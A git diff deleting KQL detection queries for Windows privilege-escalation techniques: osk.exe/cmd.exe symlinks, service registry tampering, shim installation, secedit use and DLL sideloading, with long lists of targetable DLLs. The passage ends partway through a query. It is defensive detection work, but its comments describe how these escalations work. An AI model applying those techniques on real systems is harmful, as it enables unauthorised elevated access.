diff --git a/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql b/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
deleted file mode 100644
index c40a0f11..00000000
--- a/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql b/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql
deleted file mode 100644
index e10e42a6..00000000
--- a/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov
-// Date: 2019/10/26
-// Level: high
-// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
-// Tags: attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\ImagePath" or ProcessCommandLine contains "\\FailureCommand" or ProcessCommandLine contains "\\ServiceDll") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "services") and ProcessIntegrityLevel =~ "Medium"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql b/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql
deleted file mode 100644
index dc23a7d8..00000000
--- a/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: high
-// Description: Detects potential DLL sideloading of rcdll.dll
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql b/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql
deleted file mode 100644
index fef361b2..00000000
--- a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: medium
-// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql b/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql
deleted file mode 100644
index 172b3879..00000000
--- a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql b/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql
deleted file mode 100644
index bd581c2f..00000000
--- a/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/14
-// Level: medium
-// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql b/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql
deleted file mode 100644
index 5e537033..00000000
--- a/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql b/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
deleted file mode 100644
index 56927dce..00000000
--- a/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects installation of a new shim using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql b/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql
deleted file mode 100644
index 83ffa4c6..00000000
--- a/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/01
-// Level: high
-// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql b/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql
deleted file mode 100644
index fbd5181d..00000000
--- a/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/07
-// Level: medium
-// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
deleted file mode 100644
index 1884165c..00000000
--- a/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith 
"\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or 
FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath 
endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath 
endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" 
or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath 
endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith 
"\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or 
FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains 
